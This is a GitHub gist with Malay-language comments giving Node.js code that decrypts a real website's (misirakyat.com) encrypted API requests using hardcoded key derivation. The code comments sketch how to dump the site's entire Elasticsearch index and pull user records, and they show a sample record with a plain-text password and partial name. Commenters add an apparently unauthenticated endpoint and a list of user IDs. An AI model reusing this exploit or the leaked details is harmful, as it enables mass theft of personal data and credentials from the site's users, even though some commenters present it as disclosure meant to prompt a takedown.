Created
July 4, 2023 16:02
-
-
Save RamadhanAmizudin/67d0a279b647add5e0a7e31e88cf3477 to your computer and use it in GitHub Desktop.
misirakyat.com :)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa | |
| const crypto = require('crypto'); | |
| const print = console.log | |
| function getTimestamp(data) { | |
| let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5"); | |
| let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5"); | |
| let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
| let decrypted = Buffer.concat([ | |
| decrypter.update(data, 'base64'), | |
| decrypter.final() | |
| ]).toString('utf8'); | |
| return decrypted.split('_')[0] | |
| } | |
| function getRandomInt(data) { | |
| let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5"); | |
| let iv = crypto.pbkdf2Sync('fl1','misirakyat', 7, 16, "md5"); | |
| let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
| let decrypted = Buffer.concat([ | |
| decrypter.update(data, 'base64'), | |
| decrypter.final() | |
| ]).toString('utf8'); | |
| return decrypted.split('_')[0] | |
| } | |
| function decryptRequest(input) { | |
| let data = JSON.parse(input) | |
| let key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(data['y']),'misirakyat', 7, 32, "md5"); | |
| let iv = crypto.pbkdf2Sync(getRandomInt(data['x']),'misirakyat', 7, 16, "md5"); | |
| let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
| dec = decrypter.update(data['z'], 'base64'), | |
| dec += decrypter.final() | |
| return dec | |
| } | |
| function encryptRequest(z, y, x) { | |
| // :) | |
| } | |
| // msearch request | |
| print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}')) | |
| // mget request | |
| print(decryptRequest('{"z":"io58PiyPruXYV4KoQm+mI2xj9fYQyAcblVYcM711Di1jZlg4+Yy9UxvBQT8ix9YOhSZR8NnLxLUgDFF99cTtAJm1o7V9wRqNYqwFAQRwN8ZoUf/Olmqk3DM7BQybq2qeK4qyYrbqdOzJ5urIzkkviulz5kkGAGcMlL94OL9eW6gdlXCcVofvy68U8xYZjOY8Z+AORigoUnhAbEbX3iBZUvMC/OnvatHO2UAszbSm7zNdvrtCGe8QwOCYKTEbdWD6a+hT6fxmSmn7DR+6qtndQdiX8wcfe76cW1fRc8B6IqA927ctSLmtxQtUOOW0tC4SR6lClgyi088zm3ytZP1SWfgZPzne+n7lQ+qkGOag7Vrvd0gYUBDmOCvpSKUz54nBtR0/Fo0dEwUhtwSufXBM4B2KajQovF4URjm2hssORsQiV0uH7HgOX1xAGp0AkD/Os3eDfgrHycM5ep1/LRbjyps5CX5dnEdYwWH7XHtOZrOiPeURpB7PZvuFN15sfo64g69zANxTu4bbhDNnh/iqGhhq38D/fRWRrhA2A9SVJWK7sqF16BoxAyxFfUqx8kJbdhs6ysTz7o08NiqdfwPEZYg1MBiLVa87fembsa16VOQQImqVnqOnYdFQepEP2kYLGqMb7WHtXEfGVs8OqbOja4WDD8CWylxAn/HAZPetD8RoOB8GaeU9CJjWcHXjcF5AvkwZodyB+BKQ9DmMa/DZuGknEren5UPdU7H35/9fnmIYo5blklCphlA6BNdBmRHmFKpI8p6Rcgax++qJm0z3gciTNNqYNPYKKze+jksYxCunCP3JGttOJCWNcB1Xz3lwA6d6SEQdVfg5epaJnfVNSaD18zhGvo71PhX7Z/VSL1Geyfb8RayMve1n/PvnywrrnCJYgwnf6baypK//hLyyi641mpNRowwKJKf07VdxhWjP61DriIM0Mzy4Hxrn4Dv4NVK5lGyouxSGUJC4ksvD5cjDBdPlGC/YbquWI3qgaBforFs4VKwF5a1cNfZuB2zv","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}')) | |
| // macam mana nak dump semua data? | |
| // | |
| // logic: | |
| // response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0] | |
| // while response.at_end != false | |
| // reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++] | |
| // | |
| // kalau rajin boleh amik user data with password - spoiler: plain text :) | |
| // response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]] | |
| // Contoh response: | |
| // _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication | |
| // | |
| // | |
| // Yang benar | |
| // rempah (@rempahrz) | |
| // 2023 r0xnkekw |
bang, WP scanner tu bila nak update terbaru 👯♂️
bruv
detik misi
Seyes ar
Hai
Sekadar menjernihkan lagi keadaan.
Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.
rasanya dah boleh minta takedown itu website dgn segera.
Found July 3 , Monday 3:08 AM
Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2
Response
HTTP/2 200 OK
Sample ID From POST /elasticsearch/mget decryptRequest :
1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500
Bubbleio problem?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
lmaooo serious la password plain text ssksksksk